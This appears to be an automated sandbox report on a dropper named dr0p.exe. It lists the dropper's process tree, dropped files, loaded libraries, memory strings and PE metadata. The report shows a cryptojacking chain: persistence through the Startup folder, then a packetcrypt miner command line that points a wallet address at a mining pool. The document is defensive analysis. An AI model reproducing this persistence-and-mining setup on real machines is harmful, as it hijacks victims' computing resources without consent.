Source: packetcrypt.exe, 00000006.00000003.2546735475.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547344330.00000239E3F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/mastern
Source: packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/mastern1
Source: packetcrypt.exe, 00000006.00000002.4110027580.00000239E1240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.worldC:
Source: packetcrypt.exe, 00000006.00000002.4110479379.00000239E15A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.worldC:HOMEPATH=
Source: packetcrypt.exe, 00000006.00000002.4110479379.00000239E15A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.worldin
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/binaryformatter
Source: pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4153789130.00007FFE11BB1000.00000020.00000001.01000000.0000000C.sdmp, System.Net.Ping.dll.4.dr, System.Linq.Expressions.dll.4.dr	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/download
Source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/info
Source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://github.com/clap-rs/clap/issues
Source: pkt1.exe, 00000004.00000002.4110904218.000001DA4B4D2000.00000002.00000001.01000000.00000007.sdmp, packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://github.com/clap-rs/clap/issues#
Source: packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://github.com/clap-rs/clap/issues/home/runner/.cargo/registry/src/index.crates.io-6f17d22bba150
Source: pkt1.exe, 00000004.00000002.4110638077.000001DA4AEA2000.00000002.00000001.01000000.00000010.sdmp, pkt1.exe, 00000004.00000002.4154082225.00007FFE11EA1000.00000020.00000001.01000000.0000000A.sdmp, pkt1.exe, 00000004.00000002.4154239730.00007FFE11ED1000.00000020.00000001.01000000.00000009.sdmp, pkt1.exe, 00000004.00000002.4154368557.00007FFE1A501000.00000020.00000001.01000000.00000008.sdmp, pkt1.exe, 00000004.00000002.4146708699.00007FFE11511000.00000020.00000001.01000000.0000000D.sdmp, pkt1.exe, 00000004.00000002.4112102175.000001DA4D5A0000.00000004.00000020.00020000.00000000.sdmp, pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4110591486.000001DA4AE92000.00000002.00000001.01000000.0000000F.sdmp, pkt1.exe, 00000004.00000002.4153918296.00007FFE11BD1000.00000020.00000001.01000000.0000000B.sdmp, pkt1.exe, 00000004.00000002.4110702890.000001DA4AEB2000.00000002.00000001.01000000.00000011.sdmp, pkt1.exe, 00000004.00000002.4153789130.00007FFE11BB1000.00000020.00000001.01000000.0000000C.sdmp, System.Diagnostics.TraceSource.dll.4.dr, System.Data.DataSetExtensions.dll.4.dr, System.Runtime.Loader.dll.4.dr, System.Net.Ping.dll.4.dr, System.ServiceModel.Web.dll.4.dr	String found in binary or memory: https://github.com/dotnet/runtime
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://github.com/mono/linker/issues/378
Source: System.Linq.Expressions.dll.4.dr	String found in binary or memory: https://github.com/mono/linker/pull/2125.
Source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://github.com/mono/linker/pull/649
Source: pkt1.exe, 00000004.00000002.4110904218.000001DA4B4D2000.00000002.00000001.01000000.00000007.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3DD0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3DA8000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1266000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E12FB000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1338000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3D8F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3D10000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1289000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E12C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel

Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe

Process Stats: CPU usage > 49%

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.CSharp.dll 099BC112DC645BC4A1FC453E3B4C1FC93A164BFAF69E84C85C2B6EFAC0F7FAAB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.Core.dll 816DE66126C5EFA65483B583F6A320C284E47FC7030F8CBD7DBED745FEDCD656
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.dll BD36D4FD23D717FE88F2AFEB563EC6034D7FA482278156D99EF3CBF11EC2A5D5

Source: pkt1.exe.0.dr

Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: System.Runtime.InteropServices.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.Private.CoreLib.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.Private.Uri.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.Runtime.InteropServices.JavaScript.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.Net.WebSockets.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.Private.DataContractSerialization.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.Runtime.CompilerServices.VisualC.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.ObjectModel.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.Runtime.Numerics.dll.4.dr	Static PE information: No import functions for PE file found
Source: dr0p.exe	Static PE information: No import functions for PE file found

Source: classification engine

Classification label: mal76.troj.adwa.winEXE@7/174@2/3

Source: C:\Users\user\Desktop\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

File created: C:\Users\user\AppData\Local\Temp\.net

Jump to behavior

Source: packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp	Memory string: rustls::msgs::handshakeP7
Source: packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp	Memory string: rustls::msgs::handshake

Source: C:\Users\user\Desktop\dr0p.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dr0p.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\dr0p.exe "C:\Users\user\Desktop\dr0p.exe"
Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Process created: C:\Users\user\AppData\Local\Temp\packetcrypt.exe "C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Process created: C:\Users\user\AppData\Local\Temp\packetcrypt.exe "C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world	Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source:	Binary string: System.Diagnostics.TraceSource.ni.pdb source: System.Diagnostics.TraceSource.dll.4.dr
Source:	Binary string: System.Runtime.InteropServices.ni.pdb source: pkt1.exe, 00000004.00000002.4146708699.00007FFE11511000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: pkt1.exe, 00000004.00000002.4153789130.00007FFE11BB1000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: System.Diagnostics.Process.ni.pdb source: pkt1.exe, 00000004.00000002.4154368557.00007FFE1A501000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: System.ComponentModel.Primitives.ni.pdb source: pkt1.exe, 00000004.00000002.4154239730.00007FFE11ED1000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: System.Net.Ping.ni.pdb source: System.Net.Ping.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: System.Net.Ping.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: pkt1.exe, 00000004.00000002.4110591486.000001DA4AE92000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TraceSource\Release\net8.0\System.Diagnostics.TraceSource.pdb source: System.Diagnostics.TraceSource.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: System.Net.Ping.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: pkt1.exe, 00000004.00000002.4153918296.00007FFE11BD1000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: /_/artifacts/obj/System.Data.DataSetExtensions/Release/net8.0-windows/System.Data.DataSetExtensions.pdbSHA256X source: System.Data.DataSetExtensions.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: pkt1.exe, 00000004.00000002.4154082225.00007FFE11EA1000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: pkt1.exe, 00000004.00000002.4112102175.000001DA4D5A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: pkt1.exe, 00000004.00000002.4154239730.00007FFE11ED1000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: pkt1.exe, 00000004.00000002.4115612916.00007FF68EE68000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdbSHA256i source: System.Runtime.Loader.dll.4.dr
Source:	Binary string: /_/artifacts/obj/System.ServiceModel.Web/Release/net8.0-windows/System.ServiceModel.Web.pdb source: System.ServiceModel.Web.dll.4.dr
Source:	Binary string: C:\Users\Admin.DESKTOP-9H4MNNT\Desktop\1111\PacketCryptApp\obj\Release\net8.0\win-x64\PacketCryptApp.pdbSHA256_u source: pkt1.exe, 00000004.00000002.4110904218.000001DA4C8D2000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdbSHA256%# source: pkt1.exe, 00000004.00000002.4112102175.000001DA4D5A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Console.ni.pdb source: pkt1.exe, 00000004.00000002.4154082225.00007FFE11EA1000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: /_/artifacts/obj/System.Data.DataSetExtensions/Release/net8.0-windows/System.Data.DataSetExtensions.pdb source: System.Data.DataSetExtensions.dll.4.dr
Source:	Binary string: System.Linq.Expressions.ni.pdb source: System.Linq.Expressions.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: pkt1.exe, 00000004.00000002.4154368557.00007FFE1A501000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: pkt1.exe, 00000004.00000002.4110638077.000001DA4AEA2000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: System.Memory.ni.pdb source: pkt1.exe, 00000004.00000002.4153918296.00007FFE11BD1000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: System.Threading.ni.pdb source: pkt1.exe, 00000004.00000002.4153789130.00007FFE11BB1000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: pkt1.exe, 00000004.00000002.4110591486.000001DA4AE92000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net8.0\System.Linq.Expressions.pdb source: System.Linq.Expressions.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: pkt1.exe, 00000004.00000002.4146708699.00007FFE11511000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: pkt1.exe, 00000004.00000002.4110702890.000001DA4AEB2000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: System.Private.CoreLib.ni.pdb source: pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: pkt1.exe, 00000004.00000002.4110702890.000001DA4AEB2000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net8.0\System.Linq.Expressions.pdbSHA256 source: System.Linq.Expressions.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256%B source: pkt1.exe, 00000004.00000002.4110638077.000001DA4AEA2000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: System.Runtime.Loader.dll.4.dr
Source:	Binary string: C:\Users\Admin.DESKTOP-9H4MNNT\Desktop\1111\PacketCryptApp\obj\Release\net8.0\win-x64\PacketCryptApp.pdb source: pkt1.exe, 00000004.00000002.4110904218.000001DA4C8D2000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: /_/artifacts/obj/System.ServiceModel.Web/Release/net8.0-windows/System.ServiceModel.Web.pdbSHA256 source: System.ServiceModel.Web.dll.4.dr

Source: dr0p.exe

Static PE information: 0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]

Source: dr0p.exe

Static PE information: real checksum: 0xc3e77c5a should be: 0xff85

Source: pkt1.exe.0.dr	Static PE information: section name: .CLR_UEF
Source: pkt1.exe.0.dr	Static PE information: section name: .didat
Source: pkt1.exe.0.dr	Static PE information: section name: Section
Source: pkt1.exe.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Timer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.MemoryMappedFiles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.CSharp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Configuration.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.Win32.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.Common.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.ReaderWriter.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Expressions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.Annotations.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Queryable.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Resources.Writer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ObjectModel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.SecureString.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Handles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Immutable.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.OpenSsl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Tasks.Dataflow.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Numerics.dll	Jump to dropped file
